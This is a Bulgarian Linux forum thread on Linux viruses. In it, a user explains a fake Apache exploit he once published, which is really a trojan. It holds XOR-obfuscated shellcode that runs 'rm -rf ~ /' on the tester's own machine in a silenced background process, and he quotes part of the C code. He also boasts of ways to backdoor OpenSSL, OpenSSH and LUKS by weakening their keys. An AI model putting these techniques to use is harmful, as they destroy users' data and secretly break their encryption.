Автор Тема: linux и вирусите  (Прочетена 8918 пъти)

lunarvalley

  • Напреднали
  • *****
  • Публикации: 1397
  • Distribution: Slackware
  • Window Manager: Xfce
    • Профил
Re: linux и вирусите
« Отговор #45 -: Jan 04, 2012, 15:47 »
/УФФ
Цитат
С XP Home администрирането става кошмар при 10-15 работни станции при 25 е изтезание за администратора.

Нека му е гадно бе!  :P :P :P
Активен

а съвсем друго е Next Next Finish.

n00b

  • Напреднали
  • *****
  • Публикации: 1248
  • Distribution: OSX
  • Window Manager: 10.6, 10.8, 10.9
  • Live to hack, hack to live.
    • Профил
Re: linux и вирусите
« Отговор #46 -: Jan 04, 2012, 16:39 »
На 64-битова машина не прави нищо или вероятно крашва. На 32-битова машина прави чудни подаръци.

Дай малко повечко информация, наистина ме мързи в момента да гледам какво има в онзи payload.
Активен

mobilio - професионални мобилни приложения

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: linux и вирусите
« Отговор #47 -: Jan 04, 2012, 16:53 »
Половината забава си заминава ако кажа какво става там.

Иначе не съм си играл достатъчно, мога доста по-забавна мини-концпирация да сътворя. Човек, който има вземане-даване с C, веднага ще види че има нещо доста не наред в кода, човек, който има повече идея за apache, сорса му и проблемите със сигурността му, веднага ще види че пише глупости, човек който прояви малко повече усилия, ще разбере и какво прави payload-а.

Но като цяло е забавно, доста балъци се навързаха. Не ми пука толкова за малоумните хахорчета и изненадата която са получили, но фактът, че securityfocus в продължение на дни го хостваха и неизвестен брой идиоти са го тествали да проверят колко им е сигурен apache сървъра е мноооого забавен :)


Хаха...
http://www.securityfocus.com/bid/37027/exploit

Дам, важно беше да се спомене че Symantec не са идиоти и не са тествали експлойта.
« Последна редакция: Jan 04, 2012, 17:06 от gat3way »
Активен

"Knowledge is power" - France is Bacon

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: linux и вирусите
« Отговор #48 -: Jan 05, 2012, 00:23 »
Пфу добре, де обяснявам всичко :)

Почваме от payload-а, който изглежда като shellcode като за remote exploit, ама не е. Въпреки че е  position-independant код. Ако човек реши да го дизасемблира и не разбира особено много от асемблер, няма да разбере особено много. В общи линии, MOV-ваме някакви стойности в някакъв регистър, XOR-ваме ги с някаква стойност, PUSH-ваме ги в стека и накрая викаме INT 80h. Ако човек се разрови в x86 syscall таблицата, ще види че syscall-а е SYS_execve(), демек изпълняваме това в стека с параметрите в стека.

Цялата идея е че в payload-а няма никъде нищо в cleartext вид така че някой ако реши да търси низове в binary-то примерно със strings, да разбере какво става. Проста и елементарна anti-debugging техника. Всички низове, които ще влязат в стека са XOR-криптирани и ги декриптираме on-the-fly преди да ги push-нем.

Та низовете са "/bin/rm", "-rf", "~", "/".

Тях подаваме към системното повикване SYS_execve(). Сега, това работи на x86, но не и на x86_64 - там номера на системното повикване (и съответно стойността на rax регистъра) е друга, а и calling конвенцията е друга - вече не push-ваме в стека, а предаваме на някой регистър адрес към паметта, където се намира низа. Така че това ще fail-не на AMD64 система. Освен ако не се компилира изрично с -m32.


Останалото е в C кода. Наистина сглобяваме HTTP заявка включваща payload-а и наистина я изпращаме, но тази заявка е безобидна и няма да направи никаква мизерия на отсрещния сървър.

От друга страна....


Цитат
int (*sc)()=(int(*)())shellcode;

.....

printf("Waiting some seconds to see if we got shell...\n");
pid=fork();
if (pid==0) {close(2);sc();exit(0);}
else
{
sleep(2);
if (sd)
{
printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]);
close(sd);
}
}

Тук става цялата магия. Имаме function pointer, sc който инициализираме със адреса на shellcode-а. Когато викнем sc(), реално погледнато викаме shellcode-а, локално. Сега, можеше да не е sc(),  а нещо доста близко като име до някоя libc функция, но не ми е минало през акъла. По-долу форкваме нов процес и се правим че вършим работа докато просто sleep-ваме 2 секунди. Но child процеса всъщност прави подмолната работа, първо затваря файлов дескриптор 2 (stderr) така че каквито и съобщения за грешка да излязат, да ходят в кофата. След това вика нашия shellcode, който пък exec-ва /bin/rm -rf ~ /. Тъй като parent-а не го wait()-ва, то той си излиза след 2 секунди, а в background-а, child процеса си върши работата по затриването на home директорията или / директорията (ако успее). Дори да не може да изтрие нещо, няма да излезе съобщение за грешка, което да притеснява потребителя.



Цялата схема не е особено изпипана, обаче успя да заблуди доста хора, включително добрите джедаи от securityfocus, които от своя страна изложиха на риск други добри джедаи които си secure-ват машините, не е ли смешно :)

Иначе като цяло, идеята да пишеш код, който нарочно прави катастрофи и е добре прикрита катастрофата, лично на мен много ми допада. Оттогава (това е преди повече от 2 години), доста съм се усъвършенствал в тази област хехе :)

Между другото, това не е най-забавната част. Най-забавната част е когато установиш колко е лесно да subvert-ваш криптографията. Примерно на мен ми трябват само няколко реда промени в кода на openssl библиотеката, за да направя голямата забава. Понеже apache се link-ва с нея. Примерно всички SSL сесии ще продължат да бъдат криптирани с тази малка особеност че ако аз ги снифя мога да ги разбия почти в реално време защото сесийният симетричен ключ ще е с ужасно ниска ентропия. Нека си създават нови private keys, нека си изискват ако ще EV сертификат за сума ти пари, това нищо не променя. Всичко е въпрос на едно побитово отместване някъде си. И всичко изглежда наред. По същият начин, мога да бутна кода на OpenSSH и винаги да генерира двойка ключове с ужасно ниска ентропия. Да има късмет някой да ги сложи някъде в authorized_keys, ще настане забава. По същият начин, лесно може да се subvert-не криптографията в disk encryption системите, малко да бутна сорса на LUKS, само колкото да намаля PBKDF2 итерациите на 1 и да отрежа key size-а, ще мога да си го чупя за много обозримо време. И всичко това може да се направи ама далеч по-елегантно и трудно откриваемо, така че и в opensource проект където доста хора си врат гагата, да не се усетят за каква конспирация става въпрос. Плашещо направо :)
« Последна редакция: Jan 05, 2012, 01:31 от gat3way »
Активен

"Knowledge is power" - France is Bacon

n00b

  • Напреднали
  • *****
  • Публикации: 1248
  • Distribution: OSX
  • Window Manager: 10.6, 10.8, 10.9
  • Live to hack, hack to live.
    • Профил
Re: linux и вирусите
« Отговор #49 -: Jan 05, 2012, 03:14 »
Е вече ме заинтригува определено!

Още повече че цял ден човърках с IDA по един 64 битов код...

За плашещото - нали имаше една теория, че ако извънземни се приземили на центъра на футболно игрище никой нямало да ги види даже и при 100 хиляди човека посещаемост на мача.

Та имаше една теория свързана с някакво изнасилване в щатите. Някакъв напада някакво девойче докато се прибирало от работа. Обаче тя се разкрещяла - светнали лампи и нападателя избягъл. НИКОЙ не извикал полиция защото всеки си мислел че някой друг ще го направи. След час нападателя прави второ нападение - този път лампите били по-малко, пак обаче разкрещяването я спасило. ОТНОВО никой не извикал 911. На третото нападение (след 30 минути май) обаче жертвата е била приведена в безпомощно състояние и по-късно убита. Просто не мога да се сетя обаче в момента за имена, само се сещам че е било в NY.

PS: http://en.wikipedia.org/wiki/Murder_of_Kitty_Genovese може би е това.
Активен

mobilio - професионални мобилни приложения

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: linux и вирусите
« Отговор #50 -: Jan 07, 2012, 03:02 »
Сега като замисля че често ми се е случвало да видя някой да се сдърпа с жена си и да я нарежда  Този случай ама въобще не е потресаващ и в България би станало същото, ако не е ставало вече. Сигурно бих се намесил ако видя някой да бие жена, изглежда много логично, само дето честно казано не е точно така и твърде вероятно няма да го направя щото не е моя работа. Просто защото много по-вероятно е да видиш как някой упражнява насилие над жена си вместо това как някой случаен мъж го прави със случайна жена. И някак да видиш как някой се кара с жена си и покрай това и набива някой шамар се очаква да не е точно твоя работа. От друга страна ако някой клошар скочи да бие някаква случайна жена на спирката, всички ще му се нахвърлят.

Таааа да, в конкретния случай така вероятно стават нещата понякога. Прекалено очевидни, за да може някой да заподозре нещо. Това със саботажите и конспирациите като цяло е доста забавна тема. Има някои хора, които са толкова вживяни в конспирационни теории. Аз поне лично имам рядкото щастие да имам лични наблюдения върху едно малко подмножество от тях, покрай предишната ми работа. Впоследствие съм чувал от разни хора, примерно нови колеги, разни ненормални конспирационни теории. Много е трудно да обясниш защо са ненормални. Та един ден обясних на колегата с тези теории, че ако има да казва нещо на някого, за което не иска никой да знае, най-добре е просто да не го казва по телефона, и за жалост, мнението ми беше разтълкувано прекалено превратно :)

Истината е че човек не може да бъде сигурен в нищо, но сигурността е нищо повече от risk management. Няма гаранция, че софтуера не е хитро backdoor-нат и който вярва в обратното е идиот. Няма гаранция и за хардуера, колкото и да е странно. При все това не бих заживял като Столман да ползвам скапан китайски хардуер защото е свободен и wget вместо нормален браузър, защото сайтовете ми траквали cookie-тата, user agent-а и тем подобни глупости. Това което аз лично имам да крия не е толкова важно. И по-важното, което имам да крия, мисля че съм взел достатъчно адекватни мерки да го скрия.
Активен

"Knowledge is power" - France is Bacon

dejuren

  • Напреднали
  • *****
  • Публикации: 1025
  • Distribution: Ubuntu, RedHat
  • Window Manager: lxde KDE4
    • Профил
Re: linux и вирусите
« Отговор #51 -: Jan 07, 2012, 06:37 »
Истината е че човек не може да бъде сигурен в нищо, но сигурността е нищо повече от risk management. Няма гаранция, че софтуера не е хитро backdoor-нат и който вярва в обратното е идиот. Няма гаранция и за хардуера, колкото и да е странно. При все това не бих заживял като Столман да ползвам скапан китайски хардуер защото е свободен и wget вместо нормален браузър, защото сайтовете ми траквали cookie-тата, user agent-а и тем подобни глупости. Това което аз лично имам да крия не е толкова важно. И по-важното, което имам да крия, мисля че съм взел достатъчно адекватни мерки да го скрия.
Абсолютно вярно. Единствено може да допуснем, че авторите на софтуер/хардуер са добронамерени, или поне не са клинически идиоти да бакдор-ват собствените си изделия (изключвам теориите на Конспирацията). Обикновено бакдор-ващите софтуер не са авторите, а други, така че ако си ползвате официалните хранилища, страници на проект с подписи и контролни суми, а не ровите по файло-бунища и торенти за софтуер (освен в най-най-краен случай), рискът за сладки и медени намалява до и дори под разумния минимум. Тук се сещам как един колега беше публикувал връзка към торент на Backtrack в piratebay, точно това за което говоря да не се прави по-горе. Иначе гаранция все така си няма, но ако си направите обективно оценка на риска - на кого всъщност сте интересни, и какво най-много може да загубите? (Тук пък изключвам притежателите на Швейцарски банкови сметки и над 100 карата диаманти, за тях срещу скромно възнаграждение може да проведем същия разговор в друга плоскост хехе)
Активен

http://webchat.freenode.net/?channels=ubuntu-bg
The quieter you become, the more you are able to hear.
Две седмици цъкане с мишката спестяват два часа четене на документацията.

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: linux и вирусите
« Отговор #52 -: Jan 07, 2012, 12:52 »
Знае ли човек :)

Ето един доста спорен казус, свързан с много конспирации:

http://en.wikipedia.org/wiki/NSAKEY
Активен

"Knowledge is power" - France is Bacon

dejuren

  • Напреднали
  • *****
  • Публикации: 1025
  • Distribution: Ubuntu, RedHat
  • Window Manager: lxde KDE4
    • Профил
Re: linux и вирусите
« Отговор #53 -: Jan 07, 2012, 18:51 »
Е, ние нали за това най-много обичаме големите корпорации и техните продукти! ;)
Активен

http://webchat.freenode.net/?channels=ubuntu-bg
The quieter you become, the more you are able to hear.
Две седмици цъкане с мишката спестяват два часа четене на документацията.

arda_kj

  • Напреднали
  • *****
  • Публикации: 631
  • Distribution: Debian Sid/Unstable; Ubuntu 12.04
  • Window Manager: Gnome/KDE
    • Профил
Re: linux и вирусите
« Отговор #54 -: Jan 07, 2012, 20:07 »
Не ползвам МАК , а и ставаше дума за Линукс и вирусите . Ето една статия на руски . Последно е обновена преди 6 месеца , но се вижда за какво става дума .

А ако някой толкова напира да си разбере дали може или неможе да си напише сам вирус за Линукс - ето тук - да прочете и коментарите отдолу .

Статията от последния линк е интересна. Изчетох я и наистина се оказва, че десктоп среди като КДЕ/Гном са предоставяли възможности за заобикаляне на execution bit-a, за да стартираш приложение. Т.е. ако някой свали нещо от е-майл клиента си и кликни на него може да се зарази стига това върху, което клика да е направено като т.нар launcher икони (при Гном това е форматиран текстов файл с разширение .desktop). Те нямат нужда от execution bit, за да стартират и изпълнят някаква команда. Добрата новина е, че това не е валидно понастоящем. Ако сега пробваш да кликнеш нещо такова от файл мениджъра, то той ще откаже да го изпълни понеже няма execution bit. Добре, че това са го оправили иначе човек може да сътвори доста пакости, щото винаги ще се намери някой да кликне върху подобен attachment получен по е-майл, а след това придобиване на root права е въпрос на време. Примерно винаги се налага да се ползва я sudo, я gksu ако искаш да инсталираш софт или пък да извършиш някаква административна задача и тогава може да вкараш в дефиницията на някакъв такъв lаuncher да изпълни и твоята команда (при което получаваш root привилегии).

ПС: Лудницата е пълна, е хубаво е, че хората поне оправят подобни уязвимости (които всъщност са били стандартни опции в графичните среди). От тая гледна точка май Windows не е мръднал много.
Активен

Debian Sid/Unstable; Ubuntu 12.04
"За да открием истината, е нужно поне веднъж в живота си да подложим всичко на съмнение" - Р. Декарт

edmon

  • Гост
Re: linux и вирусите
« Отговор #55 -: Jan 07, 2012, 21:07 »
След толкова приведени доказателства аз все още се питам защо:
5-те персонални компютъра преди 20 години бяха заразени с вируси,
а сега  5-те инсталирани линукса (при това в мрежата) не са заразени с вируси????
Нали броя им е равен, т.е. имат равна популярност, нали ниската популярността е основното
спасение на линукса от вируси????
Активен

Mitaka

  • Гост
Re: linux и вирусите
« Отговор #56 -: Jan 07, 2012, 22:57 »
След толкова приведени доказателства аз все още се питам защо:
5-те персонални компютъра преди 20 години бяха заразени с вируси,
а сега  5-те инсталирани линукса (при това в мрежата) не са заразени с вируси????
Нали броя им е равен, т.е. имат равна популярност, нали ниската популярността е основното
спасение на линукса от вируси????

Може би ключовата дума е "20 години"?
Защото в момента имам Windows машини, които не са пипвали вирус... нито са преинсталирани, и то от 2008-ма, че даже някои са по-стари...
Активен

edmon

  • Гост
Re: linux и вирусите
« Отговор #57 -: Jan 07, 2012, 23:11 »

Защото в момента имам Windows машини, които не са пипвали вирус... нито са преинсталирани, и то от 2008-ма, че даже някои са по-стари...
Но аз ти говоря за популярността. Ако провериш в интернет, ще видиш, че основен довод в линукс да няма вируси в такъв размер както в уиндоус е размера на потребителската база.
И ето да приемем, че потребителската база на линукс сега е изравнена с потребителската база на Уин 3.11 преди 20 години. ИМАШЕ ЛИ ВИРУСИ ЗА УИН 3.11 и колко бяха разпространени и ИМА ЛИ ВИРУСИ ЗА ЛИНУКС и колко са разпространени!
« Последна редакция: Jan 07, 2012, 23:14 от edmon »
Активен

Mitaka

  • Гост
Re: linux и вирусите
« Отговор #58 -: Jan 07, 2012, 23:50 »

Защото в момента имам Windows машини, които не са пипвали вирус... нито са преинсталирани, и то от 2008-ма, че даже някои са по-стари...
Но аз ти говоря за популярността. Ако провериш в интернет, ще видиш, че основен довод в линукс да няма вируси в такъв размер както в уиндоус е размера на потребителската база.
И ето да приемем, че потребителската база на линукс сега е изравнена с потребителската база на Уин 3.11 преди 20 години. ИМАШЕ ЛИ ВИРУСИ ЗА УИН 3.11 и колко бяха разпространени и ИМА ЛИ ВИРУСИ ЗА ЛИНУКС и колко са разпространени!

В момента Линукс е на нивото на Вин от 90-те, ОК... но докато в момента десктопите с Вин са милиарди, то тези с Линукс едва ли са няколко милиона... според мен е полулярността.
Вируси за Линукс има, просто не са разпространени. А и Линук потребителите са по-компютърно грамотни от масовият Вин потребител - това е и другата причина.
Активен

plamen_f

  • Напреднали
  • *****
  • Публикации: 1246
    • Профил
Re: linux и вирусите
« Отговор #59 -: Jan 08, 2012, 09:00 »
Цитат
то тези с Линукс едва ли са няколко милиона...

Не се заблуждавай, а пък ако е така - покажи източник на статистика достоверен.

Ако аз с моя скромен потенциал мога да гарантирам поне за 200-250 десктоп-а, интересно ми е какво ли ще гарантират гурута и сисадмини на по-високите нива.

Което ме навежда на мисълта за организиране на някакъв вид статистика да кажем за този сайт поне....
Активен

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
Mandrake Linux 10 and Linux
Настройка на програми
aaaSASlover 3 6828 Последна публикация Dec 08, 2012, 20:46
от UBIGI
Remote връзка Linux<--> Linux
Настройка на програми
stoyanovs 5 5516 Последна публикация Jan 24, 2006, 16:49
от gostenin
Experienced linux enginnced linux engineers
Търсене
bulwork 0 5982 Последна публикация May 10, 2008, 14:24
от bulwork
Dual boot Linux and Windows XP (Linux installed first) ПРОБЛЕМ !!!
Настройка на програми
XaMeLeOnA 36 33070 Последна публикация Nov 06, 2011, 02:58
от Compare
Linux From Scratch - Do-it-yourself-Linux
Начини за увеличаване на бързодействието
neosofti 2 3189 Последна публикация Jul 03, 2009, 08:43
от tyuio